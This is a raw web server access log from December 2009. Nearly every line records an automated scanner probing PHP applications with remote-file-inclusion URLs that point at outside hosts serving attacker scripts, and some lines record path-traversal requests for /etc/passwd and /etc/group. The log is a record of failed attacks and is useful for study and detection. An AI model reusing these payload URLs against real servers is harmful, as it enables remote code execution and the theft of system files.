94.7.26.184 - - [20/Dec/2009:20:14:42 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 4325376 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
94.7.26.184 - - [20/Dec/2009:20:14:46 -0800] "GET /logs/access.log HTTP/1.1" 200 199714 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
74.53.96.178 - - [20/Dec/2009:20:16:03 -0800] "GET /logs//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/perkosa.pdf??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
74.53.96.178 - - [20/Dec/2009:20:16:03 -0800] "GET /common/db.php?commonpath=http://www.sudsalentocultura.it/mail/perkosa.pdf??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
74.53.96.178 - - [20/Dec/2009:20:16:03 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/perkosa.pdf??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:16:43 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:16:45 -0800] "GET /logs/access.log//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
81.176.226.186 - - [20/Dec/2009:20:16:45 -0800] "GET /logs//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
81.176.226.186 - - [20/Dec/2009:20:16:46 -0800] "GET /include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
81.176.226.186 - - [20/Dec/2009:20:16:50 -0800] "GET /logs/access.log//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "galf.org"
81.176.226.186 - - [20/Dec/2009:20:16:50 -0800] "GET /include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "galf.org"
81.176.226.186 - - [20/Dec/2009:20:16:50 -0800] "GET /logs//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "galf.org"
222.122.141.47 - - [20/Dec/2009:20:16:54 -0800] "GET /components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:16:54 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:16:55 -0800] "GET /logs/access_090914.log%20%20//components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:04 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:39 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:39 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:39 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:55 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:55 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:17:55 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:17:56 -0800] "GET /logs/access_091026.log%20%20//components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:20:19:45 -0800] "GET /com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/van/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:20:19:45 -0800] "GET /logs/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/van/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:20:19:46 -0800] "GET /logs/access_090706.log/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/van/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:21:40 -0800] "GET /logs/access_091012.log//ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:21:40 -0800] "GET /logs//ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:21:41 -0800] "GET /ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:21:58 -0800] "GET /logs/access_091012.log//admin/spaw/spaw_control.class.php?spaw_root=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:22:12 -0800] "GET /logs/access_091012.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:20:22:12 -0800] "GET /logs/access_090706.log%20%20/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/van/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:22:44 -0800] "GET /ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:22:44 -0800] "GET /logs/access_090831.log%20%20//ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:22:44 -0800] "GET /logs//ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:20:23:07 -0800] "GET /logs/access_090921.log%20%20/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/van/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:24:07 -0800] "GET /logs/access_091012.log%20%20//ashnews.php?pathtoashnews=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:24:56 -0800] "GET /logs/access_091019.log//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:24:56 -0800] "GET /include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:24:56 -0800] "GET /logs//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:25:14 -0800] "GET /logs/access_091019.log//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:25:14 -0800] "GET /include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:25:14 -0800] "GET /logs//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:25:23 -0800] "GET /logs/access.log%20%20/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
91.195.124.10 - - [20/Dec/2009:20:25:23 -0800] "GET /logs/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.195.124.10 - - [20/Dec/2009:20:25:23 -0800] "GET /write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.106.163 - - [20/Dec/2009:20:25:31 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:26:19 -0800] "GET /logs/access_091012.log%20%20/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:26:19 -0800] "GET /write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:26:19 -0800] "GET /logs/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:26:29 -0800] "GET /logs/access_090921.log%20%20/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.163 - - [20/Dec/2009:20:26:42 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:27:29 -0800] "GET /logs/access_091109.log%20%20/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:28:01 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:28:01 -0800] "GET /components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:28:01 -0800] "GET /logs/access_090914.log%20%20//components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [20/Dec/2009:20:28:30 -0800] "GET /logs/access_091026.log%20%20//components/com_flyspray/startdown.php?file=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:29:20 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:29:20 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:29:20 -0800] "GET /logs/access_090803.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:29:26 -0800] "GET /logs/access.log/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.181.60 - - [20/Dec/2009:20:29:40 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:29:40 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:29:40 -0800] "GET /logs/access_090803.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.195.124.10 - - [20/Dec/2009:20:29:55 -0800] "GET /logs/access_091012.log/write.php?dir=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:32:58 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:32:58 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:32:58 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:32:58 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:32:58 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:32:58 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:33:01 -0800] "GET /logs/access_090803.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:33:04 -0800] "GET /logs/access_090803.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:33:18 -0800] "GET /logs/access_091102.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:20:33:27 -0800] "GET /logs/access_091102.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:20:35:18 -0800] "GET /logs/access_090921.log/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/van/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.116.0.130 - - [20/Dec/2009:20:40:07 -0800] "GET /logs/access_090706.log/administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.116.0.130 - - [20/Dec/2009:20:40:07 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.116.0.130 - - [20/Dec/2009:20:40:07 -0800] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:40:10 -0800] "GET /logs/access_090921.log//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:40:41 -0800] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [20/Dec/2009:20:41:27 -0800] "GET /logs/access_090921.log//include/write.php?dir=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:20:43:46 -0800] "GET /contrib/yabbse/poc.php?poc_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:20:43:47 -0800] "GET /contrib/yabbse/poc.php?poc_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:44:49 -0800] "GET /bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:44:49 -0800] "GET /logs/access_091109.log%20%20//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:44:49 -0800] "GET /logs//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:44:52 -0800] "GET /logs/access_090921.log%20%20//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:20:45:14 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:20:45:14 -0800] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:20:45:14 -0800] "GET /logs/access_090921.log/administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:45:26 -0800] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:20:45:53 -0800] "GET /template.php?name=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:20:45:58 -0800] "GET /logs/template.php?name=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:20:46:01 -0800] "GET /logs/template.php?name=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:20:46:05 -0800] "GET /template.php?name=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:20:48:29 -0800] "GET /logs//contrib/yabbse/poc.php?poc_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:20:48:30 -0800] "GET /logs//contrib/yabbse/poc.php?poc_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:20:51:34 -0800] "GET /logs/access.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [20/Dec/2009:20:51:34 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [20/Dec/2009:20:51:37 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [20/Dec/2009:20:51:55 -0800] "GET /skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:51:55 -0800] "GET /logs/access.log%20%20//skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:51:55 -0800] "GET /logs//skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:20:52:02 -0800] "GET /logs/index.php?go=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:20:52:02 -0800] "GET /index.php?go=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:20:52:03 -0800] "GET /logs/index.php?go=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:20:52:03 -0800] "GET /index.php?go=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:52:40 -0800] "GET /skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [20/Dec/2009:20:52:40 -0800] "GET /logs/access.log//skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [20/Dec/2009:20:52:40 -0800] "GET /logs//skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [20/Dec/2009:20:53:37 -0800] "GET /skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:53:37 -0800] "GET /logs/access_091012.log//skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [20/Dec/2009:20:53:37 -0800] "GET /logs//skin//ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:20:54:37 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:20:54:57 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:20:54:57 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
